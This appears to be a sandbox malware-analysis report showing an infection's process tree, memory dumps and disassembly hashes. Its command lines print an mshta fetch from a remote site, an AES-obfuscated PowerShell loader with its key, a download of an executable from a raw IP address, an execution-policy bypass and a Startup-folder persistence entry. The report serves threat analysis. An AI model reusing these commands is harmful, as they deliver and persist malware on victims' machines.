                                                                              2024-12-18 20:00:14 UTC3884INData Raw: 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 7a 02 47 65 74 4d 6f 64 75 6c 65 48 61 6e 64 6c 65 57 00 00 4e 04 51 75 65 72 79 50 65 72 66 6f 72 6d 61 6e 63 65 43 6f 75 6e 74 65 72 00 1a 02 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 49 64 00 1e 02 47 65 74 43 75 72 72 65 6e 74 54 68 72 65 61 64 49 64 00 00 eb 02 47 65 74 53 79 73 74 65 6d 54 69 6d 65 41 73 46 69 6c 65 54 69 6d 65 00 09 03 47 65 74 54 69 63 6b 43 6f 75 6e 74 00 00 af 05 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 19 02 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 00 8e 05 54 65 72 6d 69 6e 61 74 65 50 72 6f 63 65 73 73 00 00 0d 05 6d 65 6d 73 65 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: edExceptionFilterzGetModuleHandleWNQueryPerformanceCounterGetCurrentProcessIdGetCurrentThreadIdGetSystemTimeAsFileTimeGetTickCountUnhandledExceptionFilterGetCurrentProcessTerminateProcessmemset


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:15:00:07
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\forfiles.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
                                                                              Imagebase:0x7ff61ea80000
                                                                              File size:52'224 bytes
                                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:15:00:07
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:15:00:07
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:. \*i*\*2\msh*e https://tiffany-careers.com/ghep1
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:15:00:09
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\mshta.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1
                                                                              Imagebase:0x7ff6b4cc0000
                                                                              File size:14'848 bytes
                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:15:00:12
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff6eef20000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:5
                                                                              Start time:15:00:13
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('4C4392ECE516D550361614F1B8641852253A5A9044A308574B9B1D67D2AA2493F763385A53C21C962D73AF7A3A1A7644FEF103968D9CE4BE22CDCF4C9AAAA0D1156C1042714327D0DF9559DCEF92D952D1FED7FD44F342E94970DDD5132E30A64E35E4751324A276E21D098222A9D80B841DC7508B47242C8DE36693A37A446E45337CE1895E882872A68C1B8DC77B41FAE1F5DE0A8934D3A20E197DA6F27C6B095CECC866561B5408D27B35AD836E83E5CFCA3209303BBA973A0E0D9CD3E9998D23C90BFE13CC4BEFAE3250CE0200F86C96B61BB66F12DDB70731B13C3A28A955F482A02B32FF9A15DA1ECFBBBF793CC72EDB34A5A987FF46C0D61D6E31A789B13290EB3AD9E662512ADC0281C570BCCF12079609337C2B50C6FF3BD620E71911E95424327F329EB0DC1C6F5355D6B9A0C38A95701B7EFFFD3792E6A3BF2C09DFC231E806D1546112A4E3CA8C984F0E37455D4A9B1BF07168B9D0A2AA9CFED23A36201580A871CA7A00A0FF1092079C043208CA9D5FB2B2CD7B9D78A4DB3176B4A187FC2B0A69302794F7EF5CF7B38EA290D6A3FD0FED4D1A7CFA6F9F2ABEB4968B37732EBE6F7B5D433925FCC54BCF9F0751476C4A1F7381FCAB8207125C23DF8455AB2E13D85EB368A1619B06BF2DA9EAAD111EFB8AEEDDEFD41D80A23271E7E72E7A5905A7C4F3CF522315763C528146A5D8861258033777A0C5EBD195000561C965AA4AC7B18EAD7327CE25B8624E927D2D5D7FDDC36C21B9772937ED991F17813F0F3A8422D3AF278FAD8A504D97390558B4C0E09B3F0AFAEB83FF0ED68659D2D0133F372F5CCA602FCFC65D5B169F7EFD754CC9B688D5590926DABC2E7CF00A4B3C64F8492DDBC72D696028CEA4EF1497C9951F051DD47FBA7AA633AE4216D74BB6544091543B7A4C88AA7D7449070259AA42EF74061F08CAEB6D24698FD62B73C9B854EF540BE2BC1197A260BC8EFAC5EB1F66809412345727AAA19E00AA6AB2B0AE4E8E2214D612DCF3CC187893D8E4EFA843640E5F762AF24639A3DA6573BCBFAAD965B1008B1DA5762FE0C1DEE2B3BC73609EABEB3867D7830D8FF386594BAC138E1F2B5BF3E19010CCEB41ED303E01E3AC4371CCB141E9B798EC90619F0930690897751682C457CE95E208E0D89FCFA0C3A2F215F55C4AFA67942C7969C7EC45757A3F2B843201BA5896CE084ECF029902929420A5A605DCAE06D0E20817E54A84154B910E2A7E99DCE88C63234F53567ECD466A94DB5A936652CFB9B2A1733BB00337D0AD339944F80BA2AFFF40DFE5A067255BCBBA6FDD8FDF8857B0D56E86B756F7C329B1C464F95203B87123A10F7826ED9D32686CD372031EB990E0F919E47B5551BDA69E3DE02837FD75820E2A01F6A7D0AC1F71A9F7457ADE2919759EEA4F517ADD7A983D85B4AB3F976B6B347C72A9F8CE4E17746B79C374BCF7DA567F5D6193036C3A9147BFBF55BD54659FD8DD5702914E8D495DF4376BC0D1E4380DFAEDE844E819363C215834E1E687ABC854482303E7F2A9138B86EA3385D31DA2D6CFAF1C47A1284645A362744A4C2705A1D4B9163FD1BFB07A0A75F1E0DB2117DE25DEDCE3420754D43D6D88BC61EAB468CDACE4EBC10E259AF12DED9C8A0C34E0A2EFB4BD9481FBB751CAA484B894364EA30FC61BF09678F49094CAE7B13B5DC645845DAD9D5663D049F75C8C5C48BD68780101A2414A8D606C6B1B06274EC46254D163CDB2BE295BC7899CDCFF4B92A1A447ACF4B39C8E69');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($ernnEW, 0,$ernnEW.Length)); & $jftLKJake.Substring(0,3) $jftLKJake.Substring(3)
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:15:00:13
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:15:00:16
                                                                              Start date:18/12/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"
                                                                              Imagebase:0x7ff6bc1b0000
                                                                              File size:5'641'176 bytes
                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:8
                                                                              Start time:15:00:17
                                                                              Start date:18/12/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                              Imagebase:0x7ff74bb60000
                                                                              File size:3'581'912 bytes
                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:9
                                                                              Start time:15:00:18
                                                                              Start date:18/12/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1684,i,8099529981057222917,3572816472393853467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                              Imagebase:0x7ff74bb60000
                                                                              File size:3'581'912 bytes
                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:10
                                                                              Start time:15:00:22
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
                                                                              Imagebase:0x7ff79f870000
                                                                              File size:1'083'904 bytes
                                                                              MD5 hash:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 32%, ReversingLabs
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:15:00:22
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:15:00:23
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:18
                                                                              Start time:15:00:30
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:19
                                                                              Start time:15:00:30
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:20
                                                                              Start time:15:00:36
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\Public\Guard.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                              Imagebase:0xeb0000
                                                                              File size:893'608 bytes
                                                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 8%, ReversingLabs
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:21
                                                                              Start time:15:00:39
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:22
                                                                              Start time:15:00:39
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:23
                                                                              Start time:15:00:51
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                              Imagebase:0x7ff735c70000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:24
                                                                              Start time:15:00:53
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                              Imagebase:0x9c0000
                                                                              File size:893'608 bytes
                                                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 8%, ReversingLabs
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Executed Functions

                                                                                Function 000002B303F80FC1 Relevance: .0, Instructions: 5COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000003.1948044183.000002B303F80000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002B303F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_3_2b303f80000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                • Instruction ID: aa46de2db19822758861415425ccc0f46a3358792394a3bf87c270eb298e5a7e
                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                • Instruction Fuzzy Hash: 4990020449940766D51862910C4925C6140EB8C250FD4C880481690144D94D03AA1192
                                                                                Function 000002B303F80FB9 Relevance: .0, Instructions: 5COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000003.1948044183.000002B303F80000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002B303F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_3_2b303f80000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                • Instruction ID: aa46de2db19822758861415425ccc0f46a3358792394a3bf87c270eb298e5a7e
                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                • Instruction Fuzzy Hash: 4990020449940766D51862910C4925C6140EB8C250FD4C880481690144D94D03AA1192
                                                                                Function 000002B303F80FB1 Relevance: .0, Instructions: 5COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000003.1948044183.000002B303F80000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002B303F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_3_2b303f80000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                • Instruction ID: aa46de2db19822758861415425ccc0f46a3358792394a3bf87c270eb298e5a7e
                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                • Instruction Fuzzy Hash: 4990020449940766D51862910C4925C6140EB8C250FD4C880481690144D94D03AA1192
                                                                                Function 000002B303F80FA9 Relevance: .0, Instructions: 5COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000003.1948044183.000002B303F80000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002B303F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_3_2b303f80000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                • Instruction ID: aa46de2db19822758861415425ccc0f46a3358792394a3bf87c270eb298e5a7e
                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                • Instruction Fuzzy Hash: 4990020449940766D51862910C4925C6140EB8C250FD4C880481690144D94D03AA1192

                                                                                Executed Functions

                                                                                Function 00007FFD9AA84452 Relevance: .6, Instructions: 574COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1943413149.00007FFD9AA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ffd9aa80000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fe74f9e4e608cc7dd3dee6397f2579a568f3270142bee8916d9fb14e0ed39370
                                                                                • Instruction ID: 67976ac83144fd37b0400857dab62a6c9effaa3fa5ef3f2cdb8b7cd1b75e33fb
                                                                                • Opcode Fuzzy Hash: fe74f9e4e608cc7dd3dee6397f2579a568f3270142bee8916d9fb14e0ed39370
                                                                                • Instruction Fuzzy Hash: BBF1E533B0EAC50FE7AA976C58756B57BD1EF96210B0900FBD099CB1E3DD296C068352
                                                                                Function 00007FFD9AA849DD Relevance: .5, Instructions: 486COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1943413149.00007FFD9AA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ffd9aa80000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20ed1f1127380017f813f3e7c84a47e04a4919ac4552d430f1342ddf6fa18188
                                                                                • Instruction ID: 99e606a7be2e3c2f15998abb1da6520639db70e76cd4953cfeb94f43ac4c5840
                                                                                • Opcode Fuzzy Hash: 20ed1f1127380017f813f3e7c84a47e04a4919ac4552d430f1342ddf6fa18188
                                                                                • Instruction Fuzzy Hash: 8FE1F772B0DA894FEBA9EB6C84746A47BD1EF55314B0801FBD05DCB1E6DA39AC028741
                                                                                Function 00007FFD9AA83451 Relevance: .2, Instructions: 209COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1943413149.00007FFD9AA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ffd9aa80000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 19798cec287f28cd1cce8bf2ae118e9b2bf8506a91c6708d159bf4c55dea4f5c
                                                                                • Instruction ID: 0b2b419b025f97228df833dfa9ef824b5b8e0b88ddc9d2c45b124dd4f419463d
                                                                                • Opcode Fuzzy Hash: 19798cec287f28cd1cce8bf2ae118e9b2bf8506a91c6708d159bf4c55dea4f5c
                                                                                • Instruction Fuzzy Hash: 3751F763F0EAC60FE76A97AC58742B47BD1EF56210B0A41FBD098CB1E3D9196C068361
                                                                                Function 00007FFD9AA84B46 Relevance: .2, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1943413149.00007FFD9AA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ffd9aa80000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 99036009022ba57998bfde6a77e1094c39ef61e8765e87d1a1206b7a04f0a632
                                                                                • Instruction ID: 91b15011f661eea263934085bd3deedc068dbdf035ec8ce911e728f3c8422e66
                                                                                • Opcode Fuzzy Hash: 99036009022ba57998bfde6a77e1094c39ef61e8765e87d1a1206b7a04f0a632
                                                                                • Instruction Fuzzy Hash: 9351D373B0DA4A4FE7A9EB9C846867477D1FF58314B4801FAD05DCB2A6DA39AC428740
                                                                                Function 00007FFD9AA8451A Relevance: .1, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1943413149.00007FFD9AA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ffd9aa80000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f26871e52da46310ef390ff34cc6fa89af4fb7259412c4544e9c80a6534a7ec6
                                                                                • Instruction ID: 86b5de6688d483bb85d21a2d53853c0fad86bd84367143559c52aaddece4cdde
                                                                                • Opcode Fuzzy Hash: f26871e52da46310ef390ff34cc6fa89af4fb7259412c4544e9c80a6534a7ec6
                                                                                • Instruction Fuzzy Hash: CF418363F0EA870BF7BDA7AC0875279B6C1AF95255B5800FED45DCB1E6DD2CAC068201
                                                                                Function 00007FFD9A9B3A05 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1942986628.00007FFD9A9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A9B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ffd9a9b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                • Instruction ID: 00c2826002868e9930029d47cc23fd8ebf415929a678cd6e5201be5ae1f1dcf9
                                                                                • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                • Instruction Fuzzy Hash: 7201A77120CB0C4FD748EF0CE451AA6B3E0FB85324F10056EE58AC3695D632E881CB42
                                                                                Function 00007FFD9AA804D8 Relevance: .0, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1943413149.00007FFD9AA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ffd9aa80000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 284353813443108c77411a9c09d3f637a5ed3c5db5155e4ac23f95640d687d72
                                                                                • Instruction ID: bc7d4910a1c44384aa1753f7d0bb9ca59ec931d8cf0e00ab114dda015607eefb
                                                                                • Opcode Fuzzy Hash: 284353813443108c77411a9c09d3f637a5ed3c5db5155e4ac23f95640d687d72
                                                                                • Instruction Fuzzy Hash: A8E0DF33F0E82D0FEBB9EAEC28792F87281EF5862170802BBE91DD7181DD14AC114395

                                                                                Execution Graph

                                                                                Execution Coverage:2.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:11.7%
                                                                                Total number of Nodes:1532
                                                                                Total number of Limit Nodes:44
